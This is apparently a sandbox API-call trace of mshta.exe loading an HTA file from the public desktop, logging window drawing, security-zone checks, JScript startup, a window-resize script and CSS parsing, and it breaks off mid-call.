0 [0227.247] NtdllDefWindowProc_W () returned 0x0 [0227.247] NtdllDefWindowProc_W () returned 0x0 [0227.247] NtdllDefWindowProc_W () returned 0x0 [0227.250] NtdllDefWindowProc_W () returned 0x0 [0227.251] NtdllDefWindowProc_W () returned 0x1 [0227.252] NtdllDefWindowProc_W () returned 0x0 [0227.252] GetClientRect (in: hWnd=0x20158, lpRect=0x14d050 | out: lpRect=0x14d050) returned 1 [0227.252] GetClientRect (in: hWnd=0x20158, lpRect=0x14d050 | out: lpRect=0x14d050) returned 1 [0227.252] NtdllDefWindowProc_W () returned 0x0 [0227.252] UpdateWindow (hWnd=0x20158) [0227.252] NtdllDefWindowProc_W () returned 0x0 [0227.252] GetWindowLongW (hWnd=0x2016c, nIndex=-21) returned 5513080 [0227.259] SetBrushOrgEx (in: hdc=0x1e010702, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0227.259] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.259] MulDiv (nNumber=2, nNumerator=0, nDenominator=2) returned 0 [0227.259] MulDiv (nNumber=2, nNumerator=0, nDenominator=2) returned 0 [0227.259] MulDiv (nNumber=2, nNumerator=0, nDenominator=2) returned 0 [0227.259] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.259] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.259] Polygon (hdc=0x1e010702, apt=0x149c70, cpt=6) returned 1 [0227.260] SetBrushOrgEx (in: hdc=0x1e010702, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0227.260] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.260] MulDiv (nNumber=2, nNumerator=0, nDenominator=2) returned 0 [0227.260] MulDiv (nNumber=2, nNumerator=0, nDenominator=2) returned 0 [0227.260] MulDiv (nNumber=2, nNumerator=0, nDenominator=2) returned 0 [0227.260] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.260] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.260] Polygon (hdc=0x1e010702, apt=0x149c70, cpt=8) returned 1 [0227.260] SetBrushOrgEx (in: hdc=0x1e010702, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0227.260] MulDiv (nNumber=2, nNumerator=2, nDenominator=2) returned 2 [0227.260] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.260] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.260] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.260] MulDiv (nNumber=2, nNumerator=2, nDenominator=2) returned 2 [0227.260] MulDiv (nNumber=2, nNumerator=2, nDenominator=2) returned 2 [0227.260] Polygon (hdc=0x1e010702, apt=0x149c70, cpt=6) returned 1 [0227.261] SetBrushOrgEx (in: hdc=0x1e010702, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0227.261] MulDiv (nNumber=2, nNumerator=2, nDenominator=2) returned 2 [0227.261] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.261] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.261] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.261] MulDiv (nNumber=2, nNumerator=2, nDenominator=2) returned 2 [0227.261] MulDiv (nNumber=2, nNumerator=2, nDenominator=2) returned 2 [0227.261] Polygon (hdc=0x1e010702, apt=0x149c70, cpt=8) returned 1 [0227.261] SelectObject (hdc=0x1e010702, h=0x1900010) returned 0xc1006f8 [0227.321] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4c) returned 0x54e7d0 [0227.321] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x5532d8 [0227.321] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x584778, Size=0x18) returned 0x580280 [0227.321] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4c) returned 0x54e828 [0227.321] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x800) returned 0x54ba48 [0227.321] GetTickCount () returned 0x20bd2 [0227.321] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0227.321] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x54e880 [0227.321] ParseURLW (in: pcszURL="file:///C:/users/public/desktop/info.hta", ppu=0x14f2d8 | out: ppu=0x14f2d8) returned 0x0 [0227.321] IUnknown:AddRef (This=0x53c65c) returned 0x3 [0227.321] IInternetSecurityManager:MapUrlToZone (in: This=0x744796bc, pwszUrl="file:///C:/users/public/desktop/info.hta", pdwZone=0x14f27c, dwFlags=0x0 | out: pdwZone=0x14f27c*=0xffffffff) returned 0x800c0011 [0227.321] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.321] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.321] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0227.321] IInternetSecurityManager:ProcessUrlAction (in: This=0x744796bc, pwszUrl="file:///C:/users/public/desktop/info.hta", dwAction=0x1400, pPolicy=0x14f280, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x14f280*=0x0) returned 0x0 [0227.321] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.321] IUnknown:Release (This=0x53c65c) returned 0x2 [0227.321] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5532d8 | out: hHeap=0x510000) returned 1 [0227.321] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x584790, Size=0x18) returned 0x5802a0 [0227.321] GetTickCount () returned 0x20bd2 [0227.322] GetTickCount () returned 0x20bd2 [0227.322] ParseURLW (in: pcszURL="file:///C:/users/public/desktop/info.hta", ppu=0x14f490 | out: ppu=0x14f490) returned 0x0 [0227.322] IUnknown:AddRef (This=0x53c65c) returned 0x3 [0227.322] IUri:GetAbsoluteUri (in: This=0x53c65c, pbstrAbsoluteUri=0x14f510 | out: pbstrAbsoluteUri=0x14f510*="file:///C:/users/public/desktop/info.hta") returned 0x0 [0227.322] IUnknown:Release (This=0x53c65c) returned 0x2 [0227.322] ShouldShowIntranetWarningSecband () returned 0x0 [0227.328] GetIUriPriv () returned 0x0 [0227.328] IUnknown:Release (This=0x53c65c) returned 0x2 [0227.328] GetCursorPos (in: lpPoint=0x14f308 | out: lpPoint=0x14f308*(x=449, y=50)) returned 1 [0227.328] ScreenToClient (in: hWnd=0x2016c, lpPoint=0x14f308 | out: lpPoint=0x14f308) returned 1 [0227.328] GetKeyState (nVirtKey=16) returned 0 [0227.328] GetKeyState (nVirtKey=17) returned 0 [0227.328] GetKeyState (nVirtKey=18) returned 0 [0227.328] GetKeyState (nVirtKey=160) returned 0 [0227.328] GetKeyState (nVirtKey=162) returned 0 [0227.328] GetKeyState (nVirtKey=164) returned 0 [0227.328] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x30) returned 0x55dcf0 [0227.328] GetCurrentThreadId () returned 0xc4 [0227.329] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x55dcf0 | out: hHeap=0x510000) returned 1 [0227.329] GetCurrentThreadId () returned 0xc4 [0227.329] GetCurrentThreadId () returned 0xc4 [0227.329] ParseURLW (in: pcszURL="file:///C:/users/public/desktop/info.hta", ppu=0x14f294 | out: ppu=0x14f294) returned 0x0 [0227.329] IUnknown:AddRef (This=0x53c65c) returned 0x3 [0227.329] IInternetSecurityManager:MapUrlToZone (in: This=0x744796bc, pwszUrl="file:///C:/users/public/desktop/info.hta", pdwZone=0x14f234, dwFlags=0x0 | out: pdwZone=0x14f234*=0xffffffff) returned 0x800c0011 [0227.329] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.329] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.329] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0227.329] IInternetSecurityManager:ProcessUrlAction (in: This=0x744796bc, pwszUrl="file:///C:/users/public/desktop/info.hta", dwAction=0x1400, pPolicy=0x14f238, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x14f238*=0x0) returned 0x0 [0227.329] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.329] IUnknown:Release (This=0x53c65c) returned 0x2 [0227.329] ParseURLW (in: pcszURL="file:///C:/users/public/desktop/info.hta", ppu=0x14f224 | out: ppu=0x14f224) returned 0x0 [0227.329] IUnknown:AddRef (This=0x53c65c) returned 0x3 [0227.329] IInternetSecurityManager:MapUrlToZone (in: This=0x744796bc, pwszUrl="file:///C:/users/public/desktop/info.hta", pdwZone=0x14f1c4, dwFlags=0x0 | out: pdwZone=0x14f1c4*=0xffffffff) returned 0x800c0011 [0227.329] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.329] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.329] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0227.329] IInternetSecurityManager:ProcessUrlAction (in: This=0x744796bc, pwszUrl="file:///C:/users/public/desktop/info.hta", dwAction=0x1400, pPolicy=0x14f1c8, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x14f1c8*=0x0) returned 0x0 [0227.329] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.329] IUnknown:Release (This=0x53c65c) returned 0x2 [0227.329] CoCreateInstance (rclsid=0x14f214*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x740995b4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppv=0x14f1d0) [0227.633] malloc (_Size=0x80) returned 0x34d908 [0227.633] GetVersion () returned 0x1db10106 [0227.651] __dllonexit () returned 0x73d77ecf [0227.651] __dllonexit () returned 0x73d77e9b [0227.651] __dllonexit () returned 0x73d77eb5 [0227.651] __dllonexit () returned 0x73d77f70 [0227.652] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x763d0000 [0227.652] GetProcAddress (hModule=0x763d0000, lpProcName="RegisterTraceGuidsA") returned 0x76f7848f [0227.652] EtwRegisterTraceGuidsA () returned 0x0 [0227.652] GetProcAddress (hModule=0x763d0000, lpProcName="RegisterTraceGuidsA") returned 0x76f7848f [0227.652] EtwRegisterTraceGuidsA () returned 0x0 [0227.652] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14db84, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0227.653] GetProcAddress (hModule=0x763d0000, lpProcName="RegOpenKeyExA") returned 0x763e4907 [0227.653] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x14dca8 | out: phkResult=0x14dca8*=0x0) returned 0x2 [0227.656] IUnknown:AddRef (This=0x53c65c) returned 0x3 [0227.656] IInternetSecurityManager:MapUrlToZone (in: This=0x744796bc, pwszUrl="file:///C:/users/public/desktop/info.hta", pdwZone=0x14f0e4, dwFlags=0x0 | out: pdwZone=0x14f0e4*=0xffffffff) returned 0x800c0011 [0227.657] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.657] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.657] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0227.657] IInternetSecurityManager:ProcessUrlAction (in: This=0x744796bc, pwszUrl="file:///C:/users/public/desktop/info.hta", dwAction=0x1401, pPolicy=0x14f0e8, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x14f0e8*=0x0) returned 0x0 [0227.657] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.657] IUnknown:Release (This=0x53c65c) returned 0x2 [0227.657] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x54) returned 0x551320 [0227.657] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x584880 [0227.657] GetCurrentThreadId () returned 0xc4 [0227.657] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x14efb0, nSize=0x27 | out: lpBuffer="") returned 0x0 [0227.657] GetCurrentThreadId () returned 0xc4 [0227.657] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0227.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x14f020, cchData=6 | out: lpLCData="1252") returned 5 [0227.658] IsValidCodePage (CodePage=0x4e4) returned 1 [0227.658] GetCurrentThreadId () returned 0xc4 [0227.658] GetCurrentThreadId () returned 0xc4 [0227.658] CoCreateInstance (in: rclsid=0x73d615ec*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x73d615fc*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x26506b4 | out: ppv=0x26506b4*=0x560340) returned 0x0 [0227.658] IUnknown:AddRef (This=0x560340) returned 0x2 [0227.658] GetCurrentProcessId () returned 0x774 [0227.658] GetCurrentThreadId () returned 0xc4 [0227.658] GetTickCount () returned 0x20c9d [0227.658] ISystemDebugEventFire:BeginSession (This=0x560340, guidSourceID=0x73d616d4, strSessionName="JScript:00001908:00000196:18134301") returned 0x0 [0227.658] GetCurrentThreadId () returned 0xc4 [0227.658] GetCurrentThreadId () returned 0xc4 [0227.658] ??2@YAPAXI@Z () returned 0x2650b08 [0227.659] GetCurrentThreadId () returned 0xc4 [0227.659] StrCmpICW (pszStr1="window", pszStr2="window") returned 0 [0227.659] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x14) returned 0x5802c0 [0227.659] CoGetObjectContext (in: riid=0x73d60270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x14ef7c | out: ppv=0x14ef7c*=0x537088) returned 0x0 [0227.659] ??2@YAPAXI@Z () returned 0x2650b40 [0227.659] CGIPTable::RegisterInterfaceInGlobal () returned 0x0 [0227.659] IUnknown:AddRef (This=0x537088) returned 0x2 [0227.659] IUnknown:Release (This=0x537088) returned 0x1 [0227.659] ??2@YAPAXI@Z () returned 0x2650b68 [0227.659] GetTickCount () returned 0x20cac [0227.659] ??2@YAPAXI@Z () returned 0x26511b8 [0227.659] malloc (_Size=0x40) returned 0x2651228 [0227.659] malloc (_Size=0x104) returned 0x2651270 [0227.659] ??2@YAPAXI@Z () returned 0x2651380 [0227.659] CoGetObjectContext (in: riid=0x73d60270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x14ef98 | out: ppv=0x14ef98*=0x537088) returned 0x0 [0227.659] IUnknown:Release (This=0x537088) returned 0x1 [0227.659] CoGetObjectContext (in: riid=0x73d60270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x14ef98 | out: ppv=0x14ef98*=0x537088) returned 0x0 [0227.659] IUnknown:Release (This=0x537088) returned 0x1 [0227.660] StrCmpIW (psz1="file:///C:/users/public/desktop/info.hta", psz2="file:///C:/users/public/desktop/info.hta") returned 0 [0227.660] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x10) returned 0x5848b0 [0227.660] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x20) returned 0x5496c0 [0227.660] GetCurrentThreadId () returned 0xc4 [0227.660] realloc (_Block=0x0, _Size=0xc8) returned 0x26513a0 [0227.660] _wcsicmp (_String1="", _String2="") returned 0 [0227.661] SysStringLen (param_1="\r\n window.moveTo(50, 50);\r\n window.resizeTo(screen.width - 100, screen.height - 100);\r\n ") returned 0x65 [0227.661] free (_Block=0x2651498) [0227.661] ??3@YAXPAX@Z () returned 0x1 [0227.661] free (_Block=0x3413d0) [0227.661] free (_Block=0x2651ca8) [0227.661] free (_Block=0x2652130) [0227.661] free (_Block=0x2651f20) [0227.661] free (_Block=0x2651e10) [0227.661] ??2@YAPAXI@Z () returned 0x26527c0 [0227.661] ??2@YAPAXI@Z () returned 0x26527f8 [0227.661] malloc (_Size=0xc) returned 0x3413d0 [0227.662] ??2@YAPAXI@Z () returned 0x2652818 [0227.662] CoGetObjectContext (in: riid=0x73d60270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x14f0b8 | out: ppv=0x14f0b8*=0x537088) returned 0x0 [0227.662] IUnknown:Release (This=0x537088) returned 0x1 [0227.662] ??2@YAPAXI@Z () returned 0x2652860 [0227.662] CoGetObjectContext (in: riid=0x73d60270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x14f108 | out: ppv=0x14f108*=0x537088) returned 0x0 [0227.662] IUnknown:Release (This=0x537088) returned 0x1 [0227.662] ??2@YAPAXI@Z () returned 0x26528d0 [0227.663] ISystemDebugEventFire:IsActive (This=0x560340) returned 0x1 [0227.663] CoGetObjectContext (in: riid=0x73d60270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x14f104 | out: ppv=0x14f104*=0x537088) returned 0x0 [0227.663] IUnknown:Release (This=0x537088) returned 0x1 [0227.663] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.663] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.663] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.671] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.671] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.671] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.671] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.671] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.672] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.672] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.672] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.672] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.672] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.672] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.672] GetUpdateRgn (hWnd=0x2016c, hRgn=0xc0406f5, bErase=0) returned 2 [0227.863] ValidateRgn (hWnd=0x2016c, hRgn=0xc0406f5) returned 1 [0227.863] SetWindowPos (hWnd=0x2016c, hWndInsertAfter=0x0, X=0, Y=0, cx=1324, cy=762, uFlags=0x14) returned 1 [0227.863] GetWindowLongW (hWnd=0x2016c, nIndex=-21) returned 5513080 [0227.863] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x551d88, hWnd=0x2016c, msg=0x46, wParam=0x0, lParam=0x14e4a4*=131436, plResult=0x14e340 | out: plResult=0x14e340) returned 0x1 [0227.863] NtdllDefWindowProc_W () returned 0x0 [0227.863] GetCurrentThreadId () returned 0xc4 [0227.863] GetWindowLongW (hWnd=0x2016c, nIndex=-21) returned 5513080 [0227.863] GetCurrentThreadId () returned 0xc4 [0227.863] GetWindowLongW (hWnd=0x2016c, nIndex=-21) returned 5513080 [0227.863] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x551d88, hWnd=0x2016c, msg=0x47, wParam=0x0, lParam=0x14e4a4*=131436, plResult=0x14e33c | out: plResult=0x14e33c) returned 0x1 [0227.863] NtdllDefWindowProc_W () returned 0x0 [0227.863] GetWindowLongW (hWnd=0x2016c, nIndex=-21) returned 5513080 [0227.863] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x551d88, hWnd=0x2016c, msg=0x5, wParam=0x0, lParam=0x2fa052c, plResult=0x14df78 | out: plResult=0x14df78) returned 0x1 [0227.863] NtdllDefWindowProc_W () returned 0x0 [0227.863] GetCurrentThreadId () returned 0xc4 [0227.863] GetCurrentThreadId () returned 0xc4 [0227.863] InvalidateRgn (hWnd=0x2016c, hRgn=0xc0406f5, bErase=0) returned 1 [0227.863] DeleteObject (ho=0xc0406f5) returned 1 [0227.863] GetCurrentThreadId () returned 0xc4 [0227.864] NtdllDefWindowProc_W () returned 0x0 [0227.864] ISystemDebugEventFire:IsActive (This=0x560340) returned 0x1 [0227.865] ??3@YAXPAX@Z () returned 0x1 [0227.865] free (_Block=0x26513a0) [0227.865] GetCurrentThreadId () returned 0xc4 [0227.865] GetCurrentThreadId () returned 0xc4 [0227.865] GetCurrentThreadId () returned 0xc4 [0227.868] StrCmpICW (pszStr1="text/css", pszStr2="text/css") returned 0 [0227.868] ParseURLW (in: pcszURL="file:///C:/users/public/desktop/info.hta", ppu=0x14b098 | out: ppu=0x14b098) returned 0x0 [0227.868] CoInternetCombineUrl (in: pwzBaseUrl="file:///C:/users/public/desktop/info.hta", pwzRelativeUrl="", dwCombineFlags=0x6000000, pszResult=0x14d1c8, cchResult=0x1000, pcchResult=0x14b114, dwReserved=0x0 | out: pszResult="file:///C:/users/public/desktop/", pcchResult=0x14b114) returned 0x0 [0227.869] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x42) returned 0x554950 [0227.869] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xf8) returned 0x5492b8 [0227.869] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x8b4) returned 0x573ab0 [0227.869] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x57c388 [0227.869] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0227.869] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x57c3a0 [0227.869] IsCharSpaceW (wch=0xd) returned 1 [0227.869] IsCharSpaceW (wch=0xa) returned 1 [0227.869] IsCharSpaceW (wch=0xd) returned 1 [0227.869] IsCharSpaceW (wch=0xa) returned 1 [0227.869] IsCharSpaceW (wch=0x20) returned 1 [0227.869] IsCharSpaceW (wch=0x20) returned 1 [0227.869] IsCharSpaceW (wch=0x20) returned 1 [0227.869] IsCharSpaceW (wch=0x20) returned 1 [0227.869] IsCharSpaceW (wch=0x20) returned 1 [0227.869] IsCharSpaceW (wch=0x20) returned 1 [0227.869] IsCharSpaceW (wch=0x62) returned 0 [0227.869] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.869] IsCharSpaceW (wch=0x20) returned 1 [0227.869] IsCharSpaceW (wch=0x7b) returned 0 [0227.869] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x5807a0 [0227.869] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x57a4e0 [0227.869] IsCharSpaceW (wch=0x20) returned 1 [0227.869] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.869] IsCharSpaceW (wch=0xd) returned 1 [0227.869] IsCharSpaceW (wch=0xa) returned 1 [0227.869] IsCharSpaceW (wch=0x20) returned 1 [0227.869] IsCharSpaceW (wch=0x20) returned 1 [0227.869] IsCharSpaceW (wch=0x20) returned 1 [0227.869] IsCharSpaceW (wch=0x20) returned 1 [0227.870] IsCharSpaceW (wch=0x20) returned 1 [0227.870] IsCharSpaceW (wch=0x20) returned 1 [0227.870] IsCharSpaceW (wch=0x20) returned 1 [0227.870] IsCharSpaceW (wch=0x20) returned 1 [0227.870] IsCharSpaceW (wch=0x66) returned 0 [0227.870] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x57a4e0 | out: hHeap=0x510000) returned 1 [0227.870] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.870] IsCharSpaceW (wch=0x3a) returned 0 [0227.870] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x1c) returned 0x549710 [0227.870] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.870] IsCharSpaceW (wch=0x20) returned 1 [0227.870] IsCharSpaceW (wch=0x31) returned 0 [0227.870] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.870] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.870] IsCharSpaceW (wch=0x20) returned 1 [0227.870] IsCharSpaceW (wch=0x54) returned 0 [0227.870] IsCharAlphaNumericW (ch=0x2c) returned 0 [0227.870] IsCharSpaceW (wch=0x2c) returned 0 [0227.870] IsCharAlphaNumericW (ch=0x2c) returned 0 [0227.870] IsCharSpaceW (wch=0x20) returned 1 [0227.870] IsCharSpaceW (wch=0x73) returned 0 [0227.870] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.870] IsCharSpaceW (wch=0x3b) returned 0 [0227.870] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.870] IsCharSpaceW (wch=0xd) returned 1 [0227.870] IsCharSpaceW (wch=0xa) returned 1 [0227.870] IsCharSpaceW (wch=0x20) returned 1 [0227.870] IsCharSpaceW (wch=0x20) returned 1 [0227.870] IsCharSpaceW (wch=0x20) returned 1 [0227.870] IsCharSpaceW (wch=0x20) returned 1 [0227.870] IsCharSpaceW (wch=0x20) returned 1 [0227.870] IsCharSpaceW (wch=0x20) returned 1 [0227.870] IsCharSpaceW (wch=0x20) returned 1 [0227.870] IsCharSpaceW (wch=0x20) returned 1 [0227.870] IsCharSpaceW (wch=0x6d) returned 0 [0227.870] IsCharSpaceW (wch=0x66) returned 0 [0227.870] IsCharSpaceW (wch=0x31) returned 0 [0227.870] bsearch (_Key=0x14f03c, _Base=0x740a5220, _NumOfElements=0x9, _SizeOfElements=0x8, _PtFuncCompare=0x74084c66) returned 0x0 [0227.871] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x30) returned 0x572be0 [0227.871] IsCharSpaceW (wch=0x31) returned 0 [0227.871] IsCharSpaceW (wch=0x31) returned 0 [0227.871] IsCharSpaceW (wch=0x35) returned 0 [0227.871] IsCharSpaceW (wch=0x70) returned 0 [0227.871] IsCharSpaceW (wch=0x78) returned 0 [0227.871] IsCharSpaceW (wch=0x20) returned 1 [0227.871] IsCharSpaceW (wch=0x31) returned 0 [0227.871] IsCharSpaceW (wch=0x70) returned 0 [0227.871] IsCharSpaceW (wch=0x31) returned 0 [0227.871] IsCharSpaceW (wch=0x70) returned 0 [0227.871] IsCharSpaceW (wch=0x70) returned 0 [0227.871] IsCharSpaceW (wch=0x78) returned 0 [0227.871] IsCharSpaceW (wch=0x0) returned 0 [0227.871] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x14) returned 0x5807c0 [0227.871] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x40) returned 0x560bf8 [0227.871] IsCharSpaceW (wch=0x20) returned 1 [0227.871] IsCharSpaceW (wch=0x54) returned 0 [0227.871] IsCharSpaceW (wch=0x6e) returned 0 [0227.871] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x26) returned 0x5734d8 [0227.871] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x560bf8, Size=0x60) returned 0x55cd50 [0227.871] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x572be0 | out: hHeap=0x510000) returned 1 [0227.871] IsCharAlphaNumericW 